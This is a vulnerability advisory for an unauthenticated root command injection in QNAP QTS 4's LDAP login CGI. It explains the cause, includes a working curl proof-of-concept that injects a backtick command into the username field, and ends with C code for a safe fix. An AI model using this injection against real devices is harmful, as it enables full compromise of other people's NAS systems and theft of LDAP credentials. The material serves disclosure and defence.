SSD Advisory – QNAP QTS LDAP Authentication Remote Code Execution

SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
Based on Linux, QNAP QTS 4 is a powerful operating system deployed on all QNAP Turbo NAS devices to bring performance and enhanced functionalities under an easy-to-use web GUI. QTS allows traditional NAS capabilities, in addition to advanced sharing features and mobile platforms support. Moreover, QTS supports custom applications to expand NAS functionalities for sharing and media streaming.
On top of a traditional Linux kernel (3.4.6, x86_64), QTS 4 provides NAS capabilities implemented in user-land and a web-based UI built using cgi-bin technology. Although SSH access is available on all QNAP devices, it is possible to completely manage the device using the web interface.
From the technical standpoint, QTS 4 web UI consists of two main components:
  • A web server (thttpd) and CGI binaries. In the default configuration, this service runs as "admin", a user with root permissions. On 80/tcp, the web server hosts a set of scripts that redirect to port 8080/tcp. The service is also available over SSL (443/tcp) using Apache configured as a reverse proxy pointing to 8080/tcp. The webroot is located at /home/httpd.

    $ ps aux | grep thttpd
    5671 admin 3828 S /usr/local/sbin/Qthttpd -p 80 -nor -nos -u admin -d /home/Qhttpd -c **.*
    5716 admin 3916 S /usr/local/sbin/_thttpd_ -p 58080 -nor -nos -u admin -d /home/httpd -c **.* -h 127.0.0.1 -i /var/lock/._thttpd_.pid

  • A set of custom binaries and standard Linux utilities (e.g. ldapsearch) that are invoked from the CGI scripts to perform the required tasks

By default, the web interface is available from remote hosts with no network filtering.
Vulnerability Overview
A code injection vulnerability has been discovered in the current version of QNAP QTS 4. As mentioned, this vulnerability affects all QNAP NAS products using LDAP authentication. Valid credentials are NOT required in order to exploit this issue, allowing a remote attacker to execute arbitrary system commands as root.

In the following image, it is possible to observe the affected configuration:
Domain Security configuration
QTS 4 allows three authentication configurations:
  • No domain security – This is the default configuration using the factory settings. In this mode, there is no domain security configured and a local account repository is used. Common for SOHO, but not feasible for enterprises
  • Active Directory authentication – QTS can leverage Microsoft Active Directory for user authentication. This setting requires an external domain controller, or the QNAP device configured as a controller. This is a common configuration for Windows-centric environments
  • LDAP authentication – QTS can leverage LDAP servers for user authentication. The vulnerability described in this document affects this mode. The LDAP server can be either remote, hosted on a remote QNAP device, or set up within the local NAS device. Specific LDAP settings do not influence the exploitability of this flaw. LDAP authentication is a common configuration for heterogeneous corporate LANs having Mac and Linux workstations

The specific bug affects the authentication CGI script (authLogin.cgi), an ELF 32-bit LSB executable dynamically linked with shared libraries, available in the default configuration.
MD5 (authLogin.cgi) = dd316693027196c30125c59b23f897b2
During each login attempt, whenever LDAP authentication is enabled, authLogin.cgi executes the standard ldapsearch command-line utility to retrieve the user's LDAP entry (uid, password) in order to verify authentication. User-supplied input is copied directly into the uid LDAP filter passed to the command-line utility, and because the command is assembled as a shell string, this results in code injection.
Proof of Concept
A reliable standalone exploit simply requires curl:

#!/bin/bash
# Retrieve details on the remote target. This unauthenticated endpoint allows retrieving the device model and QTS version and build release
curl -k -X 'POST' "https://$1/cgi-bin/sysinfoReq.cgi"
# Exploit the code injection bug
echo "And now sleep for 123 seconds..."
curl -s -k -X 'POST' --data-binary $'user=admin`sleep%20123`&serviceKey=1&pwd=&r=' "https://$1/cgi-bin/authLogin.cgi"

A successful exploit execution shows:

$ ./qnap.sh 192.168.0.1
<?xml version="1.0" encoding="UTF-8" ?>
<QDocRoot version="1.0">
<model>
<modelName><![CDATA[TS-469U]]></modelName>
<internalModelName><![CDATA[TS-469]]></internalModelName>
<platform><![CDATA[TS-NASX86]]></platform>
<customModelName><![CDATA[]]></customModelName>
<displayModelName><![CDATA[TS-469U]]></displayModelName>
<storage_v2>1</storage_v2>
<encryptfsSupported><![CDATA[1]]></encryptfsSupported>
</model>
<firmware>
<version><![CDATA[4.1.0]]></version>
<build><![CDATA[20140612]]></build>
<buildTime><![CDATA[2014/06/12]]></buildTime>
</firmware>
...
</QDocRoot>
And now sleep for 123 seconds...

On the remote system:

remote$ ps aux | grep sleep
5907 admin 1196 S sh -c /usr/bin/ldapsearch -x -H "ldaps://xxxxxxxxxx" -b "dc=xxxxxx,dc=xxx" -D "uid=xxxxx,dc=xxxxx,dc=xxx" -w "xxxxxxxxxxxxxx" "uid=admin`sleep 123`"
...

As the QTS service is executed with high privileges, a successful attack results in a full compromise. Moreover, an attacker could easily obtain the LDAP account password used to bind the NAS device with the remote LDAP service, potentially resulting in further compromise.
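The process listing above shows the root cause: the ldapsearch command line is assembled as a string and handed to `sh -c`, so the username is parsed by a shell. As an added example (not QNAP's code, and not a reconstruction of authLogin.cgi), the following C shows how the same lookup is done safely: the username is escaped per RFC 4515 so it cannot rewrite the LDAP filter, and ldapsearch is launched through execv() with an argument array so no shell ever sees the input. The `/usr/bin/ldapsearch` path and the `-x -H -b -D -w` options are those visible in the advisory's ps output; the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* RFC 4515 escaping of a filter assertion value; returns a malloc'd string. */
char *ldap_filter_escape(const char *in) {
    size_t n = strlen(in);
    char *out = malloc(n * 3 + 1);        /* worst case: each byte becomes \XX */
    if (!out) return NULL;
    char *p = out;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c == '*' || c == '(' || c == ')' || c == '\\')
            p += sprintf(p, "\\%02x", c); /* e.g. ')' -> \29 */
        else
            *p++ = (char)c;
    }
    *p = '\0';
    return out;
}

/* Build "(uid=<escaped user>)" as one argv element; returns a malloc'd string. */
char *make_uid_filter(const char *user) {
    char *esc = ldap_filter_escape(user);
    if (!esc) return NULL;
    size_t len = strlen(esc) + sizeof("(uid=)");
    char *filter = malloc(len);
    if (filter) snprintf(filter, len, "(uid=%s)", esc);
    free(esc);
    return filter;
}

/* Run ldapsearch via execv() with an argument array: no /bin/sh is involved, so
 * backticks or $(...) in `user` are plain bytes. Returns exit status or -1. */
int run_ldapsearch(const char *uri, const char *base, const char *binddn,
                   const char *pw, const char *user) {
    char *filter = make_uid_filter(user);
    if (!filter) return -1;
    char *const argv[] = { "/usr/bin/ldapsearch", "-x", "-H", (char *)uri,
                           "-b", (char *)base, "-D", (char *)binddn,
                           "-w", (char *)pw, filter, NULL };
    pid_t pid = fork();
    if (pid == 0) { execv(argv[0], argv); _exit(127); }  /* child: exec failed */
    free(filter);
    int status = 0;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Note that the bind password is still visible in `ps` output when passed with `-w`, exactly as the advisory's process listing shows; ldapsearch's `-y file` option avoids that exposure.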
Vulnerable Version
QNAP QTS version 4.1.1
Vendor Response
The vendor has issued several fixes for QNAP, and has included a patch for this vulnerability as well: Security vulnerabilities addressed in QTS 4.1.4 build 0804